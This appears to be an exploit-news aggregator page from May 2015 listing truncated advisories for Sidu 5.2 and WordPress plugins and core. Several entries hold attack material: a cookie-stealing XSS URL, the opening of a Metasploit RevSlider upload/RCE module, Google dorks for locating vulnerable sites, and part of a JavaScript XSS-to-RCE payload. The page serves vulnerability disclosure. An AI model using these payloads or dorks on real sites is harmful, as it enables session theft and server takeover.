Sidu 5.2 Admin XSS Vulnerability

15 maggio 2015 - Fonte: http://www.mondounix.com
Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
Vendor Notification  May 12, 2015
May 13, 2015: Public Disclosure
 
Severity...

Leggi il seguito »

WordPress RevSlider 3.0.95 File Upload / Execute

15 maggio 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
...

Leggi il seguito »

WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE...

Leggi il seguito »

WordPress Freshmail 1.5.8 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...

Leggi il seguito »

WordPress Ad Inserter 1.5.2 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...

Leggi il seguito »

WordPress Embed-Articles 7.0.3 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...

Leggi il seguito »

WordPress Akismet 3.1.1 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ ,
https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
  Userinput reaches sensitive sink when function add_comment_author_url()
is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...

Leggi il seguito »

WordPress 4.2.1 XSS / Code Execution

9 maggio 2015 - Fonte: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
Administrator Previliged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...

Leggi il seguito »

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....

Leggi il seguito »

WordPress 4.2 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes...

Leggi il seguito »